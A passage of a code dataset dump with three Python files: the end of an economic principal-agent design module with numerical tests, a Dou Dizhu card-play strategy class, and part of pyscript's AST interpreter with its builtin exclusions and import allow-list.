exp_u(_e1, _e2, a1, a2)\n f3 = lambda _a: ir2.evaluate(_a)['e_star']\n gf1 = nd.Gradient(f1)\n gf2 = (f2(result['e_stars'][0], result['e_stars'][1]+1.0e-6)-\\\n f2(result['e_stars'][0], result['e_stars'][1]-1.e-6))/(2.e-6)\n gf3 = nd.Gradient(f3)\n dexp_numerical = gf2 * gf3(a2) + gf1(a2)\n print(('dE[u]/da_12 check for N=1, M=2: Numerical derivative: {}, AD theano: {}'.format(dexp_numerical, result['d_exp_u_pi_0_da'][1])))\n print('##########')\n\n # Test3: N=2, M=1\n\n agent_type11 = AgentType(LinearQualityFunction(1.5, 0.1), \n QuadraticCostFunction(0.2),\n ExponentialUtilityFunction(0.0))\n agent_type21 = AgentType(LinearQualityFunction(1.4, 0.1), \n QuadraticCostFunction(0.1),\n ExponentialUtilityFunction(2.0))\n agent1 = Agent(agent_type11)\n agent2 = Agent(agent_type21)\n agents = [agent1, agent2]\n\n t = RequirementPlusIncentiveTransferFunction()\n p = PrincipalProblem(ExponentialUtilityFunction(),\n RequirementValueFunction(2),\n agents, t)\n p.compile()\n\n q1 = p.agents[0].agent_types[0].q\n q2 = p.agents[1].agent_types[0].q\n v1 = p.v\n t1 = p.t\n q1.compile()\n q2.compile()\n v1.compile()\n t1.compile()\n\n a1 = np.array([0.0, 0.1, 1., 0.05])\n a2 = np.array([0.0, 0.2, 1., 0.0])\n a = np.concatenate([a1, a2])\n result = p.evaluate(a)\n xi_1 = np.random.randn(num_xis)\n xi_2 = np.random.randn(num_xis)\n temp = v1(q1(result['e_stars'][0], xi_1), q2(result['e_stars'][1], xi_2)) - \\\n (t1(q1(result['e_stars'][0], xi_1), a1) + t1(q2(result['e_stars'][1], xi_2), a2))\n mc = np.sum(temp) / num_xis \n print('Test cases for N=2, M=1')\n print(('expected utility check for N=2, M=1: Monte Carlo: {}, Collocation: {}'.format(mc, result['exp_u_pi_0'])))\n quit()\n #[2.58410778e-05 1.00850982e-01 1.41734080e+00 3.03885263e-01]\n #{'d_exp_u_pi_0_da': array([-1. , -0.73426853, 0.49732821, -0.08538814]), 'exp_u_pi_agents': [[2.5841077197397968e-05]], 'e_stars': [1.0], 'exp_u_pi_0': array(0.8999723)}\n", "sub_path": "sepdesign/_principal.py", "file_name": "_principal.py", "file_ext": "py", "file_size_in_byte": 29095, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "warnings.warn", "line_number": 25, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sepdesign._utility_functions.UtilityFunction", "line_number": 61, "usage_type": "argument"}, {"api_name": "sepdesign._value_functions.ValueFunction", "line_number": 63, "usage_type": "argument"}, {"api_name": "sepdesign._agent.Agent", "line_number": 65, "usage_type": "argument"}, {"api_name": "sepdesign._agent.Agent", "line_number": 69, "usage_type": "argument"}, {"api_name": "sepdesign._transfer_functions.TransferFunction", "line_number": 72, "usage_type": "argument"}, {"api_name": "numpy.sum", "line_number": 79, "usage_type": "call"}, {"api_name": "theano.tensor.dvector", "line_number": 105, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 105, "usage_type": "name"}, {"api_name": "theano.tensor.dvector", "line_number": 107, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 107, "usage_type": "name"}, {"api_name": "theano.tensor.scalar", "line_number": 108, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 108, "usage_type": "name"}, {"api_name": "theano.clone", "line_number": 110, "usage_type": "call"}, {"api_name": "theano.clone", "line_number": 113, "usage_type": "call"}, {"api_name": "theano.tensor.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 118, "usage_type": "name"}, {"api_name": "theano.clone", "line_number": 121, "usage_type": "call"}, {"api_name": "theano.tensor.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 129, "usage_type": "call"}, {"api_name": "theano.clone", "line_number": 132, "usage_type": "call"}, {"api_name": "design.sparse_grid", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 139, "usage_type": "attribute"}, {"api_name": "theano.clone", "line_number": 140, "usage_type": "call"}, {"api_name": "theano.tensor.dot", "line_number": 145, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 318, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 319, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 323, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.float_", "line_number": 324, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "pyipopt.create", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 366, "usage_type": "call"}, {"api_name": "pyDOE.lhs", "line_number": 369, "usage_type": "call"}, {"api_name": "pyDOE.lhs", "line_number": 372, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 378, "usage_type": "call"}, {"api_name": "sepdesign._individual_rationality.IndividualRationality", "line_number": 426, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 433, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 532, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 536, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 539, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 560, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 563, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 566, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 569, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 574, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 575, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 589, "usage_type": "attribute"}, {"api_name": "sepdesign._types.AgentType", "line_number": 592, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 612, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 626, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 628, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 635, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 638, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 641, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 659, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 660, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 661, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 668, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 683, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 686, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 693, "usage_type": "call"}, {"api_name": "numdifftools.Gradient", "line_number": 696, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 703, "usage_type": "call"}, {"api_name": "sepdesign._types.AgentType", "line_number": 706, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 709, "usage_type": "call"}, {"api_name": "sepdesign._agent.Agent", "line_number": 710, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 728, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 732, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 733, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 736, "usage_type": "call"}]}
+{"seq_id": "344364780", "text": "#! /usr/bin/env python3\n\nfrom log.log import Logger\nimport random\nimport numpy as np\n\nfrom .base_process_action import BaseProcessAction\nfrom common.hand_card_utils import HandCardUtils\nfrom enums.card_type_enum import CardTypeEnum\n\nlogger = Logger.getLog(__file__)\n\nclass ProcessThreeOneStrategy(BaseProcessAction):\n \"\"\"\n E.g. [3334], [4443], [5556], ......\n \"\"\"\n\n def __init__(self, hand_card_status, primary_item, **kwargs):\n super().__init__(hand_card_status, primary_item, **kwargs)\n\n def run(self):\n k = self.kwargs.pop('k', 1)\n exist_card = HandCardUtils.find_even_three(self.hand_card_status, k=k)\n if self.primary_item is not None:\n exist_card = list(filter(lambda x:x > self.primary_item,exist_card))\n if len(exist_card) == 0:\n logger.debug('Can not accept the card')\n return None, None, None\n rnd = random.randint(0,len(exist_card)-1)\n one_card = exist_card[rnd]\n exist_card = [one_card - ix for ix in reversed(range(k))]\n remain_card = self.__flat_card(self.hand_card_status, exist_card)\n if len(remain_card) < k:\n logger.debug('Can not accept the card')\n return None, None, None\n other_card = sorted(random.sample(remain_card, k))\n score = HandCardUtils.value_map(exist_card[-1], CardTypeEnum.CT_THREE_DOU, 3*k+k)\n put_card = list(map(lambda x:[x]*3, exist_card))\n put_card = np.reshape(put_card, (1, -1)).tolist()[0]\n put_card.extend(other_card)\n return put_card, score, exist_card[-1]\n\n def __flat_card(self, card_status, exclude_card):\n \"\"\"\n Flatten these card\n E.g.\n card status is [0,0,0,1,3,2,2,2,0,0,0,0,0,0,0,0,1,0]\n then flatten this is [3,4,4,4,5,5,6,6,7,7,QUEEN]\n \"\"\"\n flat_card = []\n for card, count in enumerate(card_status):\n if card in exclude_card:\n count -= 3\n if count > 0:\n flat_card.extend([card]*count)\n return flat_card\n", "sub_path": "ddz/v1.0/dependency/env_action/process_action_put_three_one.py", "file_name": "process_action_put_three_one.py", "file_ext": "py", "file_size_in_byte": 2055, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "log.log.Logger.getLog", "line_number": 11, "usage_type": "call"}, {"api_name": "log.log.Logger", "line_number": 11, "usage_type": "name"}, {"api_name": "base_process_action.BaseProcessAction", "line_number": 13, "usage_type": "name"}, {"api_name": "common.hand_card_utils.HandCardUtils.find_even_three", "line_number": 23, "usage_type": "call"}, {"api_name": "common.hand_card_utils.HandCardUtils", "line_number": 23, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 36, "usage_type": "call"}, {"api_name": "common.hand_card_utils.HandCardUtils.value_map", "line_number": 37, "usage_type": "call"}, {"api_name": "common.hand_card_utils.HandCardUtils", "line_number": 37, "usage_type": "name"}, {"api_name": "enums.card_type_enum.CardTypeEnum.CT_THREE_DOU", "line_number": 37, "usage_type": "attribute"}, {"api_name": "enums.card_type_enum.CardTypeEnum", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "135242755", "text": "\"\"\"Python interpreter for pyscript.\"\"\"\n\nimport ast\nimport asyncio\nimport builtins\nimport importlib\nimport logging\nimport sys\n\nfrom .const import ALLOWED_IMPORTS, LOGGER_PATH\n\n_LOGGER = logging.getLogger(LOGGER_PATH + \".eval\")\n\n#\n# Built-ins to exclude to improve security or avoid i/o\n#\nBUILTIN_EXCLUDE = {\n \"breakpoint\",\n \"compile\",\n \"input\",\n \"memoryview\",\n \"open\",\n \"print\",\n}\n\n\ndef ast_eval_exec_factory(ast_ctx, str_type):\n \"\"\"Generate a function that executes eval() or exec() with given ast_ctx.\"\"\"\n\n async def eval_func(arg_str, eval_globals=None, eval_locals=None):\n eval_ast = AstEval(\n ast_ctx.name,\n global_ctx=ast_ctx.global_ctx,\n state_func=ast_ctx.state,\n event_func=ast_ctx.event,\n handler_func=ast_ctx.handler,\n )\n eval_ast.parse(arg_str, f\"{str_type}()\")\n if eval_ast.exception_obj:\n raise eval_ast.exception_obj # pylint: disable=raising-bad-type\n eval_ast.local_sym_table = ast_ctx.local_sym_table\n if eval_globals is not None:\n eval_ast.global_sym_table = eval_globals\n if eval_locals is not None:\n eval_ast.sym_table_stack = [eval_globals]\n eval_ast.sym_table = eval_locals\n else:\n eval_ast.sym_table_stack = []\n eval_ast.sym_table = eval_globals\n else:\n eval_ast.sym_table_stack = ast_ctx.sym_table_stack.copy()\n eval_ast.sym_table = ast_ctx.sym_table\n eval_ast.curr_func = ast_ctx.curr_func\n try:\n eval_result = await eval_ast.aeval(eval_ast.ast)\n except Exception as err:\n ast_ctx.exception_obj = err\n ast_ctx.exception = f\"Exception in {ast_ctx.filename} line {ast_ctx.lineno} column {ast_ctx.col_offset}: {eval_ast.exception}\"\n ast_ctx.exception_long = (\n ast_ctx.format_exc(err, ast_ctx.lineno, ast_ctx.col_offset, short=True)\n + \"\\n\"\n + eval_ast.exception_long\n )\n raise\n ast_ctx.curr_func = eval_ast.curr_func\n return eval_result\n\n return eval_func\n\n\ndef ast_eval_factory(ast_ctx):\n \"\"\"Generate a function that executes eval() with given ast_ctx.\"\"\"\n return ast_eval_exec_factory(ast_ctx, \"eval\")\n\n\ndef ast_exec_factory(ast_ctx):\n \"\"\"Generate a function that executes exec() with given ast_ctx.\"\"\"\n return ast_eval_exec_factory(ast_ctx, \"exec\")\n\n\ndef ast_globals_factory(ast_ctx):\n \"\"\"Generate a globals() function with given ast_ctx.\"\"\"\n\n async def globals_func():\n return ast_ctx.global_sym_table\n\n return globals_func\n\n\ndef ast_locals_factory(ast_ctx):\n \"\"\"Generate a locals() function with given ast_ctx.\"\"\"\n\n async def locals_func():\n return ast_ctx.sym_table\n\n return locals_func\n\n\n#\n# Built-in functions that are also passed the ast context\n#\nBUILTIN_AST_FUNCS_FACTORY = {\n \"eval\": ast_eval_factory,\n \"exec\": ast_exec_factory,\n \"globals\": ast_globals_factory,\n \"locals\": ast_locals_factory,\n}\n\n\n#\n# Objects returned by return, break and continue statements that change execution flow,\n# or objects returned that capture particular information\n#\nclass EvalStopFlow:\n \"\"\"Denotes a statement or action that stops execution flow, eg: return, break etc.\"\"\"\n\n\nclass EvalReturn(EvalStopFlow):\n \"\"\"Return statement.\"\"\"\n\n def __init__(self, value):\n \"\"\"Initialize return statement value.\"\"\"\n self.value = value\n\n\nclass EvalBreak(EvalStopFlow):\n \"\"\"Break statement.\"\"\"\n\n\nclass EvalContinue(EvalStopFlow):\n \"\"\"Continue statement.\"\"\"\n\n\nclass EvalName:\n \"\"\"Identifier that hasn't yet been resolved.\"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize identifier to name.\"\"\"\n self.name = name\n\n def __getattr__(self, attr):\n \"\"\"Get attribute for EvalName.\"\"\"\n raise NameError(f\"name '{self.name}.{attr}' is not defined\")\n\n\nclass EvalAttrSet:\n \"\"\"Class for object and attribute on lhs of assignment.\"\"\"\n\n def __init__(self, obj, attr):\n \"\"\"Initialize identifier to name.\"\"\"\n self.obj = obj\n self.attr = attr\n\n def setattr(self, value):\n \"\"\"Set the attribute value.\"\"\"\n setattr(self.obj, self.attr, value)\n\n def getattr(self):\n \"\"\"Get the attribute value.\"\"\"\n return getattr(self.obj, self.attr)\n\n\nclass EvalFunc:\n \"\"\"Class for a callable pyscript function.\"\"\"\n\n def __init__(self, func_def, code_list, code_str):\n \"\"\"Initialize a function calling context.\"\"\"\n self.func_def = func_def\n self.name = func_def.name\n self.defaults = []\n self.kw_defaults = []\n self.decorators = []\n self.global_names = set()\n self.nonlocal_names = set()\n self.doc_string = ast.get_docstring(func_def)\n self.num_posn_arg = len(self.func_def.args.args) - len(self.defaults)\n self.code_list = code_list\n self.code_str = code_str\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n\n def get_name(self):\n \"\"\"Return the function name.\"\"\"\n return self.name\n\n async def eval_defaults(self, ast_ctx):\n \"\"\"Evaluate the default function arguments.\"\"\"\n self.defaults = []\n for val in self.func_def.args.defaults:\n self.defaults.append(await ast_ctx.aeval(val))\n self.num_posn_arg = len(self.func_def.args.args) - len(self.defaults)\n self.kw_defaults = []\n for val in self.func_def.args.kw_defaults:\n self.kw_defaults.append(\n {\"ok\": bool(val), \"val\": None if not val else await ast_ctx.aeval(val)}\n )\n\n async def eval_decorators(self, ast_ctx):\n \"\"\"Evaluate the function decorators arguments.\"\"\"\n self.decorators = []\n ast_ctx.code_str = self.code_str\n ast_ctx.code_list = self.code_list\n for dec in self.func_def.decorator_list:\n if isinstance(dec, ast.Call) and isinstance(dec.func, ast.Name):\n args = []\n for arg in dec.args:\n args.append(await ast_ctx.aeval(arg))\n self.decorators.append([dec.func.id, args])\n elif isinstance(dec, ast.Name):\n self.decorators.append([dec.id, None])\n else:\n _LOGGER.error(\n \"function %s has unexpected decorator type %s\", self.name, dec\n )\n\n def get_decorators(self):\n \"\"\"Return the function decorators.\"\"\"\n return self.decorators\n\n def get_doc_string(self):\n \"\"\"Return the function doc_string.\"\"\"\n return self.doc_string\n\n def get_positional_args(self):\n \"\"\"Return the function positional arguments.\"\"\"\n args = []\n for arg in self.func_def.args.args:\n args.append(arg.arg)\n return args\n\n async def try_aeval(self, ast_ctx, arg):\n \"\"\"Call self.aeval and capture exceptions.\"\"\"\n try:\n return await ast_ctx.aeval(arg)\n except asyncio.CancelledError: # pylint: disable=try-except-raise\n raise\n except Exception as err: # pylint: disable=broad-except\n if ast_ctx.exception_long is None:\n ast_ctx.exception_long = ast_ctx.format_exc(\n err, arg.lineno, arg.col_offset\n )\n\n async def call(self, ast_ctx, args=None, kwargs=None):\n \"\"\"Call the function with the given context and arguments.\"\"\"\n sym_table = {}\n if args is None:\n args = []\n kwargs = kwargs.copy() if kwargs else {}\n for i in range(len(self.func_def.args.args)):\n var_name = self.func_def.args.args[i].arg\n val = None\n if i < len(args):\n val = args[i]\n if var_name in kwargs:\n raise TypeError(\n f\"{self.name}() got multiple values for argument '{var_name}'\"\n )\n elif var_name in kwargs:\n val = kwargs[var_name]\n del kwargs[var_name]\n elif self.num_posn_arg <= i < len(self.defaults) + self.num_posn_arg:\n val = self.defaults[i - self.num_posn_arg]\n else:\n raise TypeError(\n f\"{self.name}() missing {self.num_posn_arg - i} required positional arguments\"\n )\n sym_table[var_name] = val\n for i in range(len(self.func_def.args.kwonlyargs)):\n var_name = self.func_def.args.kwonlyargs[i].arg\n if var_name in kwargs:\n val = kwargs[var_name]\n del kwargs[var_name]\n elif i < len(self.kw_defaults) and self.kw_defaults[i][\"ok\"]:\n val = self.kw_defaults[i][\"val\"]\n else:\n raise TypeError(\n f\"{self.name}() missing required keyword-only arguments\"\n )\n sym_table[var_name] = val\n if self.func_def.args.kwarg:\n sym_table[self.func_def.args.kwarg.arg] = kwargs\n if self.func_def.args.vararg:\n if len(args) > len(self.func_def.args.args):\n sym_table[self.func_def.args.vararg.arg] = tuple(\n args[len(self.func_def.args.args) :]\n )\n else:\n sym_table[self.func_def.args.vararg.arg] = ()\n elif len(args) > len(self.func_def.args.args):\n raise TypeError(f\"{self.name}() called with too many positional arguments\")\n ast_ctx.sym_table_stack.append(ast_ctx.sym_table)\n ast_ctx.sym_table = sym_table\n ast_ctx.code_str = self.code_str\n ast_ctx.code_list = self.code_list\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n prev_func = ast_ctx.curr_func\n ast_ctx.curr_func = self\n for arg1 in self.func_def.body:\n val = await self.try_aeval(ast_ctx, arg1)\n if isinstance(val, EvalReturn):\n val = val.value\n break\n # return None at end if there isn't a return\n val = None\n if ast_ctx.get_exception_obj():\n break\n ast_ctx.sym_table = ast_ctx.sym_table_stack.pop()\n ast_ctx.curr_func = prev_func\n return val\n\n\nclass AstEval:\n \"\"\"Python interpreter AST object evaluator.\"\"\"\n\n def __init__(\n self,\n name,\n global_ctx=None,\n state_func=None,\n event_func=None,\n handler_func=None,\n logger_name=None,\n ):\n \"\"\"Initialize an interpreter execution context.\"\"\"\n self.name = name\n self.str = None\n self.ast = None\n self.global_ctx = global_ctx\n self.global_sym_table = global_ctx.get_global_sym_table() if global_ctx else {}\n self.sym_table_stack = []\n self.sym_table = self.global_sym_table\n self.local_sym_table = {}\n self.curr_func = None\n self.filename = name\n self.code_str = None\n self.code_list = None\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n self.state = state_func\n self.handler = handler_func\n self.event = event_func\n self.lineno = 1\n self.col_offset = 0\n self.logger_handlers = set()\n self.logger = None\n self.set_logger_name(logger_name if logger_name is not None else self.name)\n\n async def ast_not_implemented(self, arg, *args):\n \"\"\"Raise NotImplementedError exception for unimplemented AST types.\"\"\"\n name = \"ast_\" + arg.__class__.__name__.lower()\n raise NotImplementedError(f\"{self.name}: not implemented ast \" + name)\n\n async def aeval(self, arg, undefined_check=True):\n \"\"\"Vector to specific function based on ast class type.\"\"\"\n name = \"ast_\" + arg.__class__.__name__.lower()\n try:\n if hasattr(arg, \"lineno\"):\n self.lineno = arg.lineno\n self.col_offset = arg.col_offset\n val = await getattr(self, name, self.ast_not_implemented)(arg)\n if undefined_check and isinstance(val, EvalName):\n raise NameError(f\"name '{val.name}' is not defined\")\n return val\n except Exception as err: # pylint: disable=broad-except\n if self.exception is None:\n func_name = self.curr_func.get_name() + \"(), \" if self.curr_func else \"\"\n self.exception_obj = err\n self.exception = f\"Exception in {func_name}{self.filename} line {self.lineno} column {self.col_offset}: {err}\"\n self.exception_long = self.format_exc(err, self.lineno, self.col_offset)\n raise\n\n # Statements return NONE, EvalBreak, EvalContinue, EvalReturn\n async def ast_module(self, arg):\n \"\"\"Execute ast_module - a list of statements.\"\"\"\n val = None\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n return val\n\n async def ast_import(self, arg):\n \"\"\"Execute import.\"\"\"\n for imp in arg.names:\n if imp.name not in ALLOWED_IMPORTS:\n raise ModuleNotFoundError(f\"import of {imp.name} not allowed\")\n if imp.name not in sys.modules:\n mod = importlib.import_module(imp.name)\n else:\n mod = sys.modules[imp.name]\n self.sym_table[imp.name if imp.asname is None else imp.asname] = mod\n\n async def ast_importfrom(self, arg):\n \"\"\"Execute from X import Y.\"\"\"\n if arg.module not in ALLOWED_IMPORTS:\n raise ModuleNotFoundError(f\"import from {arg.module} not allowed\")\n if arg.module not in sys.modules:\n mod = importlib.import_module(arg.module)\n else:\n mod = sys.modules[arg.module]\n for imp in arg.names:\n self.sym_table[imp.name if imp.asname is None else imp.asname] = getattr(\n mod, imp.name\n )\n\n async def ast_if(self, arg):\n \"\"\"Execute if statement.\"\"\"\n val = None\n if await self.aeval(arg.test):\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n return val\n\n async def ast_for(self, arg):\n \"\"\"Execute for statement.\"\"\"\n loop_var = await self.aeval(arg.target)\n loop_iter = await self.aeval(arg.iter)\n for i in loop_iter:\n self.sym_table[loop_var] = i\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n break\n if isinstance(val, EvalBreak):\n break\n if isinstance(val, EvalReturn):\n return val\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalReturn):\n return val\n return None\n\n async def ast_while(self, arg):\n \"\"\"Execute while statement.\"\"\"\n while await self.aeval(arg.test):\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n break\n if isinstance(val, EvalBreak):\n break\n if isinstance(val, EvalReturn):\n return val\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalReturn):\n return val\n return None\n\n async def ast_try(self, arg):\n \"\"\"Execute try...except statement.\"\"\"\n try:\n for arg1 in arg.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n if self.exception_obj is not None:\n raise self.exception_obj # pylint: disable=raising-bad-type\n except Exception as err: # pylint: disable=broad-except\n self.exception_obj = None\n self.exception = None\n self.exception_long = None\n for handler in arg.handlers:\n exc_list = await self.aeval(handler.type)\n if not isinstance(exc_list, tuple):\n exc_list = [exc_list]\n match = False\n for exc in exc_list:\n if isinstance(err, exc):\n match = True\n break\n if match:\n if handler.name is not None:\n self.sym_table[handler.name] = err\n for arg1 in handler.body:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n if handler.name is not None:\n del self.sym_table[handler.name]\n return val\n if self.exception_obj is not None:\n if handler.name is not None:\n del self.sym_table[handler.name]\n raise self.exception_obj # pylint: disable=raising-bad-type\n if handler.name is not None:\n del self.sym_table[handler.name]\n break\n else:\n raise err\n else:\n for arg1 in arg.orelse:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val\n finally:\n for arg1 in arg.finalbody:\n val = await self.aeval(arg1)\n if isinstance(val, EvalStopFlow):\n return val # pylint: disable=lost-exception\n return None\n\n async def ast_raise(self, arg):\n \"\"\"Execute raise statement.\"\"\"\n raise await self.aeval(arg.exc)\n\n async def ast_pass(self, arg):\n \"\"\"Execute pass statement.\"\"\"\n\n async def ast_expr(self, arg):\n \"\"\"Execute expression statement.\"\"\"\n return await self.aeval(arg.value)\n\n async def ast_break(self, arg):\n \"\"\"Execute break statement - return special class.\"\"\"\n return EvalBreak()\n\n async def ast_continue(self, arg):\n \"\"\"Execute continue statement - return special class.\"\"\"\n return EvalContinue()\n\n async def ast_return(self, arg):\n \"\"\"Execute return statement - return special class.\"\"\"\n val = await self.aeval(arg.value)\n return EvalReturn(val)\n\n async def ast_global(self, arg):\n \"\"\"Execute global statement.\"\"\"\n if self.curr_func:\n for var_name in arg.names:\n self.curr_func.global_names.add(var_name)\n\n async def ast_nonlocal(self, arg):\n \"\"\"Execute nonlocal statement.\"\"\"\n if self.curr_func:\n for var_name in arg.names:\n self.curr_func.nonlocal_names.add(var_name)\n\n async def recurse_assign(self, lhs, val):\n \"\"\"Recursive assignment.\"\"\"\n if isinstance(lhs, ast.Tuple):\n try:\n val_len = len(val)\n except TypeError:\n raise TypeError(\"cannot unpack non-iterable object\")\n if len(lhs.elts) < val_len:\n raise ValueError(\n f\"too many values to unpack (expected {len(lhs.elts)})\"\n )\n if len(lhs.elts) > val_len:\n raise ValueError(f\"too few values to unpack (expected {len(lhs.elts)})\")\n for lhs_elt, val_elt in zip(lhs.elts, val):\n await self.recurse_assign(lhs_elt, val_elt)\n elif isinstance(lhs, ast.Subscript):\n var = await self.aeval(lhs.value)\n if isinstance(lhs.slice, ast.Index):\n ind = await self.aeval(lhs.slice.value)\n var[ind] = val\n else:\n lower = await self.aeval(lhs.slice.lower) if lhs.slice.lower else None\n upper = await self.aeval(lhs.slice.upper) if lhs.slice.upper else None\n step = await self.aeval(lhs.slice.step) if lhs.slice.step else None\n var[slice(lower, upper, step)] = val\n else:\n var_name = await self.aeval(lhs)\n if isinstance(var_name, EvalAttrSet):\n var_name.setattr(val)\n return\n if var_name.find(\".\") >= 0:\n self.state.set(var_name, val)\n return\n if self.curr_func and var_name in self.curr_func.global_names:\n self.global_sym_table[var_name] = val\n return\n if self.curr_func and var_name in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if var_name in sym_table:\n sym_table[var_name] = val\n return\n else:\n raise TypeError(f\"can't find nonlocal '{var_name}' for assignment\")\n self.sym_table[var_name] = val\n\n async def ast_assign(self, arg):\n \"\"\"Execute assignment statement.\"\"\"\n await self.recurse_assign(arg.targets[0], await self.aeval(arg.value))\n\n async def ast_augassign(self, arg):\n \"\"\"Execute augmented assignment statement (lhs = value).\"\"\"\n var_name = await self.aeval(arg.target)\n if isinstance(var_name, EvalAttrSet):\n val = await self.aeval(\n ast.BinOp(\n left=ast.Constant(value=var_name.getattr()),\n op=arg.op,\n 